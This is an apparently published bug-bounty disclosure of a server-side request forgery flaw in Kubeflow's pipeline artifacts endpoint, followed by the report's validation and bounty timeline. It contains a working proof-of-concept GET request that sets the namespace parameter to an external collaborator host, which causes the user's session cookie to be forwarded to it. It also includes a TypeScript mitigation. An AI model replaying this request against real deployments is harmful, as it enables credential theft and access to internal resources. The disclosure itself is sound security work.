External HTTP Interaction in kubeflow/kubeflow

Valid

Reported on Apr 17th 2023

Description

Any user can use Kubeflow as a proxy to access both internal and external resources and have the response to the request returned to the user.

PoC

URL Parameter: namespace

Request:

GET /pipeline/artifacts/get?source=xm&namespace=9eomgq1gcd6tzkmqvib9clrneek58zwo.oastify.com&peek=256&bucket=mlpipeline&key=artifacts%2Ftrainingjob-q2fvq%2F2023%2F03%2F16%2Ftrainingjob-q2fvq-1001629031%2Fmain.log HTTP/1.1
Host: 127.0.0.1:9999
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9999/pipeline/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cookie: authservice_session=MTY4MTc1MTUxN3xOd3dBTkROSFJFcFFUVFpJU0VwQ1dsbFRVelZOU2sxRVJqUkZTa3RTTTFwVlYwRlVWVFZGV1ZrMVQwOVpNa3BLU1RkUVJsTlpTMUU9fLLtca39Ki69m3CjrYYtyjAjyhdv6zPWIyJPcLVSczLZ
Connection: close

Responses can be seen in this private album: https://imgur.com/a/DRiwDra

The Kubeflow server returns Burp Collaborator's response to the user of Kubeflow. Note that Kubeflow sends the user's authentication cookie with the outbound request, which allows account hijacking.
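As an added example, not Kubeflow's own code: a hardened handling of the namespace parameter described above, written for the Node/TypeScript frontend that serves the artifacts endpoint. The upstream host template and the forwarded-header allowlist are assumptions; the point is that the namespace is validated as a Kubernetes DNS-1123 label before it is used to build a hostname, and that the user's session cookie never leaves the server.

```typescript
// Added example, not taken from the Kubeflow code base.
// Kubernetes namespace names are DNS-1123 labels: 1-63 chars, lowercase
// alphanumerics and '-', starting and ending with an alphanumeric. A value
// such as "attacker.example.com" can never match, so it cannot steer the
// request to a host outside the cluster.
const DNS1123_LABEL = /^[a-z0-9]([-a-z0-9]{0,61}[a-z0-9])?$/;

// Assumed in-cluster host template for the per-namespace artifact proxy.
const UPSTREAM_HOST_TEMPLATE = "ml-pipeline-ui-artifact.{ns}.svc.cluster.local";

export function isValidNamespace(ns: unknown): ns is string {
  return typeof ns === "string" && DNS1123_LABEL.test(ns);
}

// Builds the upstream URL from a fixed template, or returns null when the
// request must be rejected with 400. Query values are typed `unknown`
// because a framework such as Express may hand back arrays or objects.
export function buildArtifactUrl(query: Record<string, unknown>): string | null {
  const { namespace, bucket, key, source } = query;
  if (!isValidNamespace(namespace)) return null;
  if (typeof bucket !== "string" || typeof key !== "string") return null;
  if (typeof source !== "string" || !/^[a-z0-9]+$/.test(source)) return null;
  const host = UPSTREAM_HOST_TEMPLATE.replace("{ns}", namespace);
  const u = new URL(`http://${host}/artifacts/get`);
  u.searchParams.set("source", source);
  u.searchParams.set("bucket", bucket);
  u.searchParams.set("key", key);
  return u.toString();
}

// Headers forwarded on the server-to-server hop. Only a small allowlist is
// copied; the user's session cookie is deliberately dropped so that it can
// never reach any host the request did not originally target.
export function upstreamHeaders(incoming: Record<string, string>): Record<string, string> {
  const allowed = new Set(["accept", "accept-encoding", "range"]);
  const out: Record<string, string> = {};
  for (const [name, value] of Object.entries(incoming)) {
    const lower = name.toLowerCase();
    if (allowed.has(lower)) out[lower] = value;
  }
  return out;
}
```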

Impact

Account hijacking, access to internal resources, browser hijacking. Either a logged-in user can access internal resources, or an attacker can craft a link and have an authenticated user click it to steal their credentials or hijack their browser.

Occurrences

This is the parameter, but probably not the right spot in the code for the vuln.

We are processing your report and will contact the kubeflow team within 24 hours. 10 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 10 months ago
Dan McInerney modified the report 9 months ago
Dan McInerney modified the Severity from High (8.5) to High (7.7) 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Marcello validated this vulnerability 4 months ago
danmcinerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 2 months ago